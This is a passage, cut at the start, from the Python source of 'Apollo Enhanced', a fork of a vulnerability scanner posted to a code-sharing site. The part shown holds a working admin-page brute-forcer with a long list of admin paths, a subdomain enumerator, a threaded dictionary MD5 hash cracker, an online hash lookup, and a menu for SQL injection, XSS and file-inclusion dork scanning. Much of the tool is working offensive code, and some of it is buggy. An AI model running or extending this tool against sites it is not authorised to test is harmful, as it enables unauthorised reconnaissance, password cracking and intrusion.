min/','ccp14admin/','irc-macadmin/','banneradmin/','sshadmin/','phpldapadmin/','macadmin/','administratoraccounts/','admin4_account/','admin4_colon/','radmind-1/','Super-Admin/','AdminTools/','cmsadmin/','SysAdmin2/','globes_admin/','cadmins/','phpSQLiteAdmin/','navSiteAdmin/','server_admin_small/','logo_sysadmin/','server/','database_administration/','power_user/','system_administration/','ss_vms_admin_sm/']
    
    # Plain concatenation: no separator handling between site and add.
    for add in dirs:
        test = site + add
        queue.put(test)
        
    # Twenty daemon workers; join() blocks until every candidate is task_done().
    for i in range(20):
        thread = Atest(queue)
        thread.setDaemon(True)
        thread.start() 
    queue.join()

def aprint():
    """Print the admin-page scan results collected in the module-level ``found`` list."""
    print('Search Finished\n')
    if not found:
        print('-[!]-  No pages found')
        return
    for page in found:
        # O/G/W are the ANSI colour constants defined later in this file
        print(O + '-[!]-  Found: ' + G + page + W)

       
class SDtest(threading.Thread):
    """Checks given Domain for Sub Domains"""
    def __init__(self, queue):
        threading.Thread.__init__(self)
        self.queue = queue
 
    def run(self):
        """Checks if Sub Domain responds"""
        while True:
            try:
                domain = self.queue.get(False)
            except Queue.Empty:
                break
            try:
                site = domain
                conn = urllib2.Request(site)
                conn.add_header('User-Agent', choice(USER_AGENT))
                opener = urllib2.build_opener()
                opener.open(conn)
            except urllib2.URLError:
                self.queue.task_done()
            else:
                target = socket.gethostbyname(domain)  
                print 'Found: ' + site + ' - ' + target
                self.queue.task_done()        
 

def subd():
    """Prompt for a domain and probe a fixed list of common sub-domain labels.

    Every label is joined to the entered domain with a dot and queued; twenty
    daemon SDtest workers consume the queue and this call blocks on
    queue.join() until all queued items have been marked done.
    """
    work = Queue.Queue()
    domain = raw_input('Domain: ')
    labels = [
        "admin", "access", "accounting", "accounts", "admin", "administrator", "aix", "ap",
        "archivos", "aula", "aulas", "ayuda", "backup", "backups", "bart", "bd", "beta",
        "biblioteca", "billing", "blackboard", "blog", "blogs", "bsd", "cart", "catalog",
        "catalogo", "catalogue", "chat", "chimera", "citrix", "classroom", "clientes",
        "clients", "carro", "connect", "controller", "correoweb", "cpanel", "csg",
        "customers", "db", "dbs", "demo", "demon", "demostration", "descargas",
        "developers", "development", "diana", "directory", "dmz", "domain",
        "domaincontroller", "download", "downloads", "ds", "eaccess", "ejemplo",
        "ejemplos", "email", "enrutador", "example", "examples", "exchange", "eventos",
        "events", "extranet", "files", "finance", "firewall", "foro", "foros", "forum",
        "forums", "ftp", "ftpd", "fw", "galeria", "gallery", "gateway", "gilford",
        "groups", "groupwise", "guia", "guide", "gw", "help", "helpdesk", "hera",
        "heracles", "hercules", "home", "homer", "hotspot", "hypernova", "images",
        "imap", "imap3", "imap3d", "imapd", "imaps", "imgs", "imogen", "inmuebles",
        "internal", "intranet", "ipsec", "irc", "ircd", "jabber", "laboratorio", "lab",
        "laboratories", "labs", "library", "linux", "lisa", "login", "logs", "mail",
        "mailgate", "manager", "marketing", "members", "mercury", "meta", "meta01",
        "meta02", "meta03", "miembros", "minerva", "mob", "mobile", "moodle", "movil",
        "mssql", "mx", "mx0", "mx1", "mx2", "mx3", "mysql", "nelson", "neon", "netmail",
        "news", "novell", "ns", "ns0", "ns1", "ns2", "ns3", "online", "oracle", "owa",
        "partners", "pcanywhere", "pegasus", "pendrell", "personal", "photo", "photos",
        "pop", "pop3", "portal", "postman", "postmaster", "private", "proxy", "prueba",
        "pruebas", "public", "ras", "remote", "reports", "research", "restricted",
        "robinhood", "router", "rtr", "sales", "sample", "samples", "sandbox", "search",
        "secure", "seguro", "server", "services", "servicios", "servidor", "shop",
        "shopping", "smtp", "socios", "soporte", "squirrel", "squirrelmail", "ssh",
        "staff", "sms", "solaris", "sql", "stats", "sun", "support", "test", "tftp",
        "tienda", "unix", "upload", "uploads", "ventas", "virtual", "vista", "vnc",
        "vpn", "vpn1", "vpn2", "vpn3", "wap", "web1", "web2", "web3", "webct",
        "webadmin", "webmail", "webmaster", "win", "windows", "www", "ww0", "ww1",
        "ww2", "ww3", "www0", "www1", "www2", "www3", "xanthus", "zeus",
    ]

    for label in labels:
        work.put(label + '.' + domain)

    for _ in range(20):
        worker = SDtest(work)
        worker.setDaemon(True)
        worker.start()
    work.join()


class Cracker(threading.Thread):
    """Use a wordlist to try and brute the hash"""
    def __init__(self, queue, hashm):
        threading.Thread.__init__(self)
        self.queue = queue
        self.hashm = hashm

    def run(self): 
        """Hash word and check against hash"""
        while True:
            try:
                word = self.queue.get(False)
            except Queue.Empty:
                break
            tmp = hashlib.md5(word).hexdigest()
            if tmp == self.hashm:
                self.result(word)   
            self.queue.task_done() 

    def result(self, words):
        """Print result if found"""
        print self.hashm + ' = '+Words

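def word():
    """Prompt for a wordlist path and an MD5 hex digest, then run a dictionary check.

    Every line of the wordlist (newline characters removed) is queued; five
    daemon Cracker threads consume the queue and this call blocks on
    queue.join() until every item is marked done.
    Raises IOError if the wordlist cannot be opened.
    """
    work = Queue.Queue()
    wordlist = raw_input('Wordlist: ')
    hashm = raw_input('Enter MD5 hash: ')
    # `with` closes the file even if reading raises; the explicit close() was skipped on error
    with open(wordlist) as handle:
        for line in handle:
            # NOTE(review): only '\n' is stripped, so a '\r' from CRLF files stays in the word
            work.put(line.replace("\n", ""))
    for _ in range(5):
        worker = Cracker(work, hashm)
        worker.setDaemon(True)
        worker.start()
    work.join()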


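class OnlineCrack:
    """Look up an MD5 digest on an external web service (md5.hashcracking.com)."""

    def crack(self):
        """Prompt for an MD5 hash, query the service once and print the verdict.

        The entered value is interpolated into the query string without
        escaping.  urllib2.URLError/HTTPError raised by the request are not
        caught and propagate to the caller.
        """
        hashm = raw_input('Enter MD5 Hash: ')
        conn = urllib2.Request('http://md5.hashcracking.com/search.php?md5=%s' % (hashm))
        conn.add_header('User-Agent', choice(USER_AGENT))
        opener = urllib2.build_opener()
        # one request; the original opened the same URL twice and discarded the first body
        data = opener.open(conn).read()
        if data == 'No results returned.':
            print('\n-[!]- Not found!')
        # NOTE(review): exact equality only matches a body that is literally
        # 'Cleartext of'; a longer response would not be reported -- confirm the
        # service's response format before relying on this
        if data == 'Cleartext of':
            print('\n-[!]- %s' % (data))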


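class Check:
    """Report this host's public IP address as seen by an external web site."""

    def grab(self):
        """Fetch tracemyip.org once, scrape the address from its HTML and print it.

        urllib2.URLError (which includes HTTPError) is caught and reported as
        '-[!]-  Error connecting'; the original caught only HTTPError, so a
        plain connection failure escaped as a traceback.  Other exceptions
        propagate.
        """
        site = 'http://www.tracemyip.org/'
        try:
            conn = urllib2.Request(site)
            conn.add_header('User-Agent', choice(USER_AGENT))
            opener = urllib2.build_opener()
            # single request; the original fetched the page twice
            data = opener.open(conn).read()
            start = data.find('onClick="', 0, len(data))
            end = data.find('size=', start, len(data))
            # NOTE(review): fixed offsets into the page markup; find() returns -1
            # when a marker is missing, which silently yields a wrong slice
            ip_add = data[start+46:end-2].strip()
            print(B+'\n-[!]-  Your IP Address Is '+R+'%s' % (ip_add) +W)
        except urllib2.URLError:  # HTTPError is a subclass, so it is still covered
            print('-[!]-  Error connecting')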
    

def output():
    """Print the dork-scan tallies and, for options 1-4, the result-file name.

    Reads the module-level counters ``vuln``, ``invuln`` and ``np`` and the
    menu selection ``option``.

    NOTE(review): main()'s menu labels 2 as Cross Site Scripting and 3 as
    Local File Incursion, whereas the messages below map 2 to lfi-result.txt
    and 3 to xss-result.txt -- one side is mislabelled; confirm against Crawl.
    """
    print('\n>> ' + str(vuln) + G + ' Vulnerable Sites Found' + W)
    print('>> ' + str(invuln) + G + ' Sites Not Vulnerable' + W)
    print('>> ' + str(np) + R + ' Sites Without Parameters' + W)
    saved_message = {
        '1': '>> Output Saved To sqli-result.txt\n',
        '2': '>> Output Saved To lfi-result.txt',
        '3': '>> Output Saved To xss-result.txt',
        '4': '>> Output Saved To rfi-result.txt',
    }
    if option in saved_message:
        print(saved_message[option])


# ANSI SGR escape sequences used to colour terminal output.
W = "\033[0m"   # reset
R = "\033[31m"  # red
G = "\033[32m"  # green
O = "\033[33m"  # yellow
B = "\033[34m"  # blue

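def _show_changes():
    """Print the change log and road map shown for menu option 10."""
    print(O + '''\n--- Changes Made in Enhanced Apollo ---''')
    print(G + '''
    = Apollo now scan wider range of SQL DBs
    ---- MySQL [More errors]
    ---- MsSQL [More errors]
    ---- Oracle/JBDC
    ---- ODBC
    ---- OLEDB
    ---- JETDB
    ---- ADODB
    ---- ProgreSQL
    ---- Sybase
    = XSS added evasion
    = Removed paramiko, due to errors
    = Added Color UI
    = Added more admin pages''')
    print(O + '''\n--- Future Plans ---''')
    print(G + '''
    = Random User Agent [WIP]
    = TOR/Polipo [WIP]
    = SSH tunnelling (better than paramiko)
    = Online Proxy Grabber [WIP]
    = More detail on IP [WIP]
    = SQL Column Counter [WIP]
    = Persistent XSS finder
    = XSS finder with manual options
    = SQLi with manual options''')
    print(B + '''\n## Contact at [email protected] ##''')
    print(W)


def main():
    """Show the banner and menu, read an option and run the matching action.

    Re-prompts (after a short pause) when the entry is empty or not one of
    the menu numbers; the original re-entered main() recursively for that,
    so a long run of bad input deepened the stack each time.  The chosen
    value is stored in the module-level ``option`` read by Crawl and output().
    Mixed tab/space indentation in the original body has been normalised to
    spaces.

    NOTE(review): the menu labels 2 as Cross Site Scripting and 3 as Local
    File Incursion, while output() reports 2 as lfi-result.txt and 3 as
    xss-result.txt -- one of the two is mislabelled; confirm against Crawl.
    """
    global option
    while True:
        print(O + '''
    Apollo [Enhanced]
    by madhatter

    Original by Sotd
    github.com/SotdCode/Apollo''')
        print(G + '''
-[1]-  SQL Injection
-[2]-  Cross Site Scripting
-[3]-  Local File Incursion
-[4]-  Remote File Incursion
-[5]-  Admin Page Finder
-[6]-  Sub Domain Finder
-[7]-  Dictionary MD5 cracker
-[8]-  Online MD5 cracker
-[9]-  IP Address Checker
-[10]- See What Changed''')
        print(W)
        option = raw_input('-[!]-  Enter Option: ')

        if not option:
            print(R + '\nYou Must Enter An Option\n' + W)
            time.sleep(0.5)
            continue

        if option in ('1', '2', '3', '4'):
            # Crawl reads the module-level option to decide which scan to run
            Crawl()
            output()
        elif option == '5':
            admin()
            aprint()
        elif option == '6':
            subd()
        elif option == '7':
            word()
        elif option == '8':
            OnlineCrack().crack()
        elif option == '9':
            Check().grab()
        elif option == '10':
            _show_changes()
        else:
            print(R + '\nInvalid Choice\n' + W)
            time.sleep(0.5)
            continue
        return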

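if __name__ == '__main__':
    main()
# A stray `elif conf.get("threads", 0) > 1: os._exit(0)` used to follow this
# guard.  Neither `conf` nor `os` appears in the imports at the top of the
# file, so importing the module (rather than running it) raised NameError.
# The branch has been removed.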

Initial URL
https://github.com/SotdCode

Initial Description
This is a fork of the original “Apollo” Python Vulnerability Scanner project by Sotd. This fork has substantially enhanced SQL and XSS dorking functions. Please do not rip either my or Sotd's code, because if you do, KITTENS WILL DIE! Ahem…

Initial Title
Apollo Enhanced

Initial Tags


Initial Language
Python